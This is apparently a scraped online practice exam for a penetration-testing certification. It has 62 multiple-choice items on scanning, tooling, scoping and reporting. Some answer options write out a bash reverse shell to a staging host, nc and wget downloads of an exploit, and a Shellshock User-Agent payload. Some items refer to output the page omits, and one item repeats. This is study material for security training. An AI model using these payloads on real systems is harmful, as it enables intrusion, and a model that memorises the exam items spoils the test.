Questions
ayuda
option
My Daypo

ERASED TEST, YOU MAY BE INTERESTED ONPentesting plus

COMMENTS STATISTICS RECORDS
TAKE THE TEST
Title of test:
Pentesting plus

Description:
Practice Exam

Author:
Nicks
(Other tests from this author)

Creation Date:
14/03/2023

Category:
Others

Number of questions: 62
Share the Test:
Facebook
Twitter
Whatsapp
Share the Test:
Facebook
Twitter
Whatsapp
Last comments
No comments about this test.
Content:
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner? chmod u+x script.sh chmod u+e script.sh chmod o+e script.sh chmod o+x script.sh.
A penetration tester gains access to a system and establishes persistence, and then run the following commands: Which of the following actions is the tester MOST likely performing? Redirecting Bash history to /dev/null Making a copy of the user's Bash history to further enumeration Covering tracks by clearing the Bash history Making decoy files on the system to confuse incident responders.
A compliance-based penetration test is primarily concerned with: Obtaining PII from the protected network. Bypassing protection on edge devices. Determining the efficacy of a specific set of security standards. Obtaining specific information from the protected network.
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework? Understanding the tactics of a security intrusion can help disrupt them. Scripts that are part of the framework can be imported directly into SIEM tools. The methodology can be used to estimate the cost of an incident better. The framework is static and ensures stability of a security program over time.
Which of the following BEST describe the OWASP Top 10? (Choose two.) The most critical risks of web applications A list of all the risks of web applications The risks defined in order of importance A web-application security standard A risk-governance and compliance framework A checklist of Apache vulnerabilities.
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an attacker gain internal access to the affected machine? Edit the discovered file with one line of code for remote callback. Download .pl files and look for usernames and passwords. Edit the smb.conf file and upload it to the server. Download the smb.conf file and look at configurations.
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk? Whether sensitive client data is publicly accessible Whether the connection between the cloud and the client is secure Whether the client's employees are trained properly to use the platform Whether the cloud applications were developed using a secure SDLC.
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution? nc 10.10.51.50 9891 < exploit powershell -exec bypass -f \\10.10.51.50\9891 bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit wget 10.10.51.50:9891/exploit.
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement? grep -v apache ~/bash_history > ~/.bash_history rm -rf /tmp/apache chmod 600 /tmp/apache taskkill /IM ג€apacheג€ /F.
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience? Executive summary of the penetration-testing methods used Bill of materials including supplies, subcontracts, and costs incurred during assessment Quantitative impact assessments given a successful software compromise Code context for instances of unsafe typecasting operations.
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal? Metasploit Hydra SET WPScan.
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? Unsupported operating systems Susceptibility to DDoS attacks Inability to network The existence of default passwords.
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised? To remove hash-cracking registry entries To remove the tester-created Mimikatz account To remove tools from the server To remove a reverse shell from the system.
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker? nmap 192.168.1.1-5 -PU22-25,80 nmap 192.168.1.1-5 -PA22-25,80 nmap 192.168.1.1-5 -PS22-25,80 nmap 192.168.1.1-5 -Ss22-25,80.
A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output? The HTTP port is not open on the firewall. The tester did not run sudo before the command. The web server is using HTTPS instead of HTTP. This URI returned a server error.
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following MOST likely describes what happened? The penetration tester was testing the wrong assets. The planning process failed to ensure all teams were notified. The client was not ready for the assessment to start. The penetration tester had incorrect contact information.
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish? Uncover potential criminal activity based on the evidence gathered. Identify all the vulnerabilities in the environment. Limit invasiveness based on scope. Maintain confidentiality of the findings.
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers? Web archive GitHub File metadata Underground forums.
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task? Run nmap with the -O, -p22, and -sC options set against the target. Run nmap with the -sV and -p22 options set against the target. Run nmap with the --script vulners option set against the target. Run nmap with the -sA option set against the target.
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive? Run another scanner to compare. Perform a manual test on the server. Check the results on the scanner. Look for the vulnerability online.
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the HIGHEST likelihood of success? Attempting to tailgate an employee who is going into the client's workplace Dropping a malicious USB key with the company's logo in the parking lot Using a brute-force attack against the external perimeter to gain a foothold Performing spear phishing against employees by posing as senior management.
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router. Which of the following is MOST vulnerable to a brute-force attack? WPS WPA2-EAP WPA-TKIP WPA2-PSK.
A penetration tester writes the following script: Which of the following objectives is the tester attempting to achieve? Determine active hosts on the network. Set the TTL of ping packets for stealth. Fill the ARP table of the networked devices. Scan the system on the most used ports.
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report? Delete the scheduled batch job. Close the reverse shell connection. Downgrade the svsaccount permissions. Remove the tester-created credentials.
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report? Delete the scheduled batch job. Close the reverse shell connection. Downgrade the svsaccount permissions. Remove the tester-created credentials.
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective? Socat tcpdump Scapy dig.
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment? Partially known environment testing Known environment testing Unknown environment testing Physical environment testing.
he following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggering a `probable port scan` alert in the organization's IDS? Line 01 Line 02 Line 07 Line 08 Line 12.
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE? Cost of the assessment Report distribution Testing restrictions Liability.
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to define FIRST? Establish the format required by the client. Establish the threshold of risk to escalate to the client immediately. Establish the method of potential false positives. Establish the preferred day of the week for reporting.
A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user? iam_enum_permissions iam_prive_sc_scan iam_backdoor_assume_role iam_bruteforce_permissions.
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT? Halt the penetration test. Conduct an incident response. Deconflict with the penetration tester. Assume the alert is from the penetration test.
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance? Wardriving Shodan Recon-ng Aircrack-ng.
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team? Multiple handshakes IP addresses Encrypted file transfers User hashes sent over SMB.
A penetration tester conducts an Nmap scan against a target and receives the following results: Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target? Nessus ProxyChains OWASP ZAP Empire.
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT? Reach out to the primary point of contact. Try to take down the attackers. Call law enforcement officials immediately. Collect the proper evidence and add to the final report.
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file? Nmap Wireshark Metasploit Netcat.
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered Which of the following MOST likely occurred on the second scan? A firewall or IPS blocked the scan. The penetration tester used unsupported flags. The edge network device was disconnected. The scan returned ICMP echo replies.
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to: ✑ Have a full TCP connection ✑ Send a `hello` payload ✑ Wait for a response ✑ Send a string of characters longer than 16 bytes Which of the following approaches would BEST support the objective? Run nmap -Pn -sV --script vuln <IP address>. Employ an OpenVAS simple scan against the TCP port of the host. Create a script in the Lua language and use it with NSE. Perform a credentialed scan with Nessus.
Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the: devices produce more heat and consume more power. devices are obsolete and are no longer available for replacement. protocols are more difficult to understand. devices may cause physical world effects.
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective? nmap -sT -vvv -O 192.168.1.2/24 -PO nmap -sV 192.168.1.2/24 -PO nmap -sA -v -O 192.168.1.2/24 nmap -sS -O 192.168.1.2/24 -T1.
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing? Phishing Tailgating Baiting Shoulder surfing.
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position. Which of the following actions, if performed, would be ethical within the scope of the assessment? Exploiting a configuration weakness in the SQL database Intercepting outbound TLS traffic Gaining access to hosts by injecting malware into the enterprise-wide update server Leveraging a vulnerability on the internal CA to issue fraudulent client certificates Establishing and maintaining persistence on the domain controller.
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server? Perform vertical privilege escalation. Replay the captured traffic to the server to recreate the session. Use John the Ripper to crack the password. Utilize a pass-the-hash attack.
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester? NDA MSA SOW MOU.
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following: Which of the following tools would be BEST for the penetration tester to use to explore this site further? Burp Suite DirBuster WPScan OWASP ZAP.
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>. Which of the following would be the best action for the tester to take NEXT with this information? Create a custom password dictionary as preparation for password spray testing. Recommend using a password manager/vault instead of text files to store passwords securely. Recommend configuring password complexity rules in all the systems and applications. Document the unprotected file repository as a finding in the penetration-testing report.
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal? <# <$ ## #$ #!.
A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging. Which of the following techniques would BEST accomplish this goal? RFID cloning RFID tagging Meta tagging Tag nesting.
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`} Which of the following edits should the tester make to the script to determine the user context in which the server is being run? exploits = {“User-Agent”: “() { ignored;};/bin/bash -i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”} exploits = {“User-Agent”: “() { ignored;};/bin/bash -i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”} exploits = {“User-Agent”: “() { ignored;};/bin/sh -i ps -ef” 0>&1″, “Accept”: “text/html,application/xhtml+xml,application/xml”} exploits = {“User-Agent”: “() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80″ 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}.
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.) Wireshark Nessus Retina Burp Suite Shodan Nikto.
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection? nmap -P0 -T0 -sS 192.168.1.10 nmap -sA -sV --host-timeout 60 192.168.1.10 nmap -f --badsum 192.168.1.10 nmap -A -n 192.168.1.10.
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT? Send deauthentication frames to the stations. Perform jamming on all 2.4GHz and 5GHz channels. Set the malicious AP to broadcast within dynamic frequency selection channels. Modify the malicious AP configuration to not use a preshared key.
Which of the following protocols or technologies would in-transit confidentially protection for emailing the final security assessment report? S/MIME FTPS DNSSEC AS2.
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report? Stronger algorithmic requirements Access controls on the server Encryption on the user passwords A patch management program.
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL? SQLmap Nessus Nikto DirBuster.
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan? nmap -sn 10.12.1.0/24 nmap -sV -A 10.12.1.0/24 nmap -Pn 10.12.1.0/24 nmap -sT -p- 10.12.1.0/24.
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance? Shodan Nmap WebScarab-NG Nessus.
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment? Whether the cloud service provider allows the penetration tester to test the environment Whether the specific cloud services are being used by the application The geographical location where the cloud services are running Whether the country where the cloud service is based has any impeding laws.
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT? John the Ripper Hydra Mimikatz Cain and Abel.
A penetration tester obtained the following results after scanning a web server using the dirb utility: Which of the following elements is MOST likely to contain useful information for the penetration tester? index.html about info home.html.
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal? Wireshark Aircrack-ng Kismet Wifite.
Report abuse Consent Terms of use